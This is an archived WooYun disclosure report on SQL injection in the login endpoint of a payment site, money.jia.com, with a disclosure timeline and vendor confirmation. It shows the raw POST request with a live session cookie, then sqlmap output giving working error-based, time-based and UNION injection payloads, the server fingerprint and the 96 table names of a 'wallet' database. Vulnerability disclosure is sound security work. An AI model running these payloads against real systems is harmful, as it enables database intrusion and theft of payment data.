乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经确认,细节仅向厂商公开 2015-12-10: 细节向核心白帽子及相关领域专家公开 2015-12-20: 细节向普通白帽子公开 2015-12-30: 细节向实习白帽子公开 2016-01-14: 细节向公众公开
POST /index.php?c=login&m=get_login_area HTTP/1.1Content-Length: 333Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=tth9od1e979qnfi197aln7ql76; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b31e60a96ab3c9216f49cf6a23c11f57%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22113.134.39.39%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1448828093%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D18001cb5b45a405b93e90c0d7b4bb66aHost: money.jia.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*login_name=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: login_name (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: login_name=1' AND (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(1285=1285,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kSpI'='kSpI Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: login_name=1' AND (SELECT * FROM (SELECT(SLEEP(5)))HcCA) AND 'JFxN'='JFxN Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: login_name=1' UNION ALL SELECT CONCAT(0x71787a7071,0x58756646446344714a47,0x7170627171),NULL#---web server operating system: Windows 7web application technology: PHP 5.3.10, Apache 2.2.27back-end DBMS: MySQL 5.0Database: wallet[96 tables]+---------------------------------+| admin_log || admin_role || admin_role_function || admin_user || admin_user_copy || api_text || api_time_log || area || checkin || company || company_details || company_shop || config || create_pay_log || function_details || function_group || gz_audit || gz_audit_check || gz_audit_details || gz_audit_enter || gz_audit_id || gz_audit_tmp || gz_audit_transfer || gz_cash_details || gz_company || gz_company_detail || gz_enter || gz_enter_id || gz_notc_users || gz_receipt_log || gz_shop_collection || gz_transfer_id || ip_collection || ip_login || ip_order || ip_sign || key_cash_id || log_admin_log || log_login || mobile_terminal_check_log || order_shipment || pay_fail || pay_list_status || pay_sms_log || pay_user_sign || pos_install || pos_type || query_pay_log || receipt_log || recharge_log || shop_gather || sms_verify || user_information || user_order_list || user_recharge || wallet_acquire_list || wallet_cash || wallet_cash_confirm || wallet_cash_details || wallet_cash_refund || wallet_cash_trade || wallet_credit || wallet_hanging || wallet_hanging_remarks || wallet_log || wallet_log_201419 || wallet_log_201420 || wallet_log_201421 || wallet_log_201422 || wallet_log_201423 || wallet_log_201424 || wallet_log_201425 || wallet_log_201426 || wallet_log_201427 || wallet_log_201428 || wallet_log_201429 || wallet_log_201430 || wallet_log_201431 || wallet_log_201432 || wallet_log_201433 || wallet_log_201434 || wallet_log_201435 || wallet_log_201436 || wallet_log_201437 || wallet_log_201438 || wallet_log_201439 || wallet_log_201440 || wallet_log_201441 || wallet_log_201442 || wallet_log_201443 || wallet_request_log || wallet_seller_account || wallet_seller_account_temp || wallet_seller_account_temp_copy || wallet_slip_no || wallet_sms_reply |+---------------------------------+
危害等级:高
漏洞Rank:20
确认时间:2015-11-30 10:02
谢谢提交!
暂无
